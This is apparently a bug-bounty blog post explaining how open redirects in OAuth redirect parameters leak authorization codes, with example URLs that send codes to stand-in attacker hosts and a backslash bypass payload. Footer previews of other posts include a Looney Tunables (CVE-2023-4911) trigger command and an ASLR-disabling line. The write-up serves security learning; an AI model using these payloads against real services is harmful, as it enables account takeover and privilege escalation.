What can I do with Open Redirect with OAuth?

-



Open redirect, what can we do with it? I will share two bugs I found and could make it high with open redirect issue/feature XD.

let's say our target's name is (target.com), and the application's OAuth service is (oauthtarget.com).

let's clear something there are two types of open redirect in OAuth, first one in the OAuth Service it self and second one is the company which will use this OAuth service, let's take the following URL as an example


http://oauthtarget.com/oauth?redirect_uri=http://companyX.com/callback&client=NA


If you open this (in real use XD) you will be asked to accept or reject the access from CompanyX to your information in the owner application of OAuth Service, when you accept the access the application will redirect you to the URL from the (redirect_uri) parameter but it will add an Access Token (Code), CompanyX will use this Token to access your informaiton, so if an attacker could steal this Code he can access the informaiton of this user. The following is an example when the OAuth Service send the token


http://companyX.com/callback?code=XXXXXX&state=SOMETHING


Now what if we have an open redirect issue in the (redirect_uri) parameter and what if we have an open redirect in the (CompanyX.com) domain, what will happen?

Let's take first case the open redirect in the (redirect_uri) parameter, what you think in this case the issue will be in the OAuth Service or the CompanyX? that's right it will be in the OAuth service itself if we found an open redirect in the OAuth Service it will direclty send the Access Token to our domain which we will add in the parameter, for example


http://oauthtarget.com/oauth?redirect_uri=http://attacker_domain.com/callback&client=NA


when you accept the access the token will be sent to (attacker_domain.com) and the attacker will use the Code with the endpoint on (CompanyX) which will give the attacker access to the account of this Code.

Second case is the redirect in (CompanyX) like [http://companyx.com/?url=//attacker.com] this will redirect the user to (attacker.com), what if we used this with the OAuth Service like this one


http://oauthtarget.com/oauth?redirect_uri=http%3A%2F%2Fcompanyx.com%2F%3Furl%3D%2F%2Fattacker.com


the OAuth Service will redirect the user to (companyx.com) and companyx will redirect the user to (attacker.com) so the code will be passed to (attacker.com) and the attacker will access the code and use it to take over the vicitm's account, this case the issue is in the CompanyX domain.

I hope these two cases are clear.

let's talk about the Bug XD, my target was using his own OAuth Service in the following path


http://oauthtarget.com/login?TARGET=http://target.com/callback


the service use parameter (TARGET) to redirect the user after accepting the access, I found an open redirect in this parameter by using this payload [http://attacker.com\.target.com/callback] using this payload the service will send the user to (attacker.com) like the following


http://attacker.com\.target.com/callback?code=XXXX


The attacker will access this code from his servers' logs and will use it to access the victim's account, let's see the following graph may be it will help you.


I hope it is clear to you xD, if you have any confusion just DM me on Twitter or FB.

GoodBye.

Comments

Post a Comment

Popular posts from this blog

Exploit & Debug Looney Tunables CVE-2023-4911 Local Privilege Escalation in the glibc's ld.so

-
Image
Hoi, let's try to debug and explain CVE-2023-4911 which is a buffer overflow in the glibc loader my debugging and exploit tested on Ubuntu 22.04.2 (Jammy Jellyfish), you can read the analysis and more information from the Qualys Security writeup . POC to check if you are vulnerable or not env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help My exploit POC video takes 5m but I speeded up the video Preparing let's disable ASLR and debug our exploit echo 0 | sudo tee /proc/sys/kernel/randomize_va_space you have to know (from qualys security): On Linux, the stack is randomized in a 16GB region, and our environment strings can occupy up to 6MB (_STK_LIM / 4 * 3, in the kernel's bprm_stack_limits()): after 16GB / 6MB = 2730 tries we have a good chance of guessing the address of our environment strings. using the buffer overflow vulnerability in the tunables we will overflow the link_map struct wh
Read more

Let's Analysis STM32F103 Chip Firmware from Attify

-
Image
( بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ ) Let's start our blog. As we know any IoT device should have a firmware to run it and there is a thought that it is secure by default because it is in a board, but we know that we can dump this firmware, our firmware know is already shared with us something like training to learn basics of reversing firmware. you can download the firmware from here . if we run the file command on the firmware we will find this "STM32F103C-firmware.bin: data" and if we try to get the architecture using binwalk it will return empty result "binwalk -A STM32F103C-firmware.bin" but we don't need this because it is a famous chip and we can know what we want from google. After searching for the chip name STM32F103C we will open its default page you will know that it run using "ARM Cortex M3" we will need that later, it is time to analysis using Ghidra. Analysis Dropping the firmware file to Ghidra but it will not detect anything
Read more

Using CSRF I Got Weird Account Takeover

-
Image
Hi guys, I'm back again this bug was interesting and weird let's start. let's refer to the target's name as (target.com) I start to test the domain like what I do in my testing, I used sublist3r to enumerate the subdomains, in one of these subdomains I start to test the password reset function I sent a request to my email to change the password, i opened the link and sent the request to change the password but i used my Burp to see the request and it looks like that there is a token for CSRF I tested this token and deleted it but the change happens, that means there is no filtring for this token there is a CSRF bug here and there is another thing the token of reset password not in the request not in the cookies or in the body so i think it's in the sessions and how i knew that? I test the function of reset password I sent another link to my account and i sent the same request but it returns 403, I opened the new reset link bug didn't use it and I go b
Read more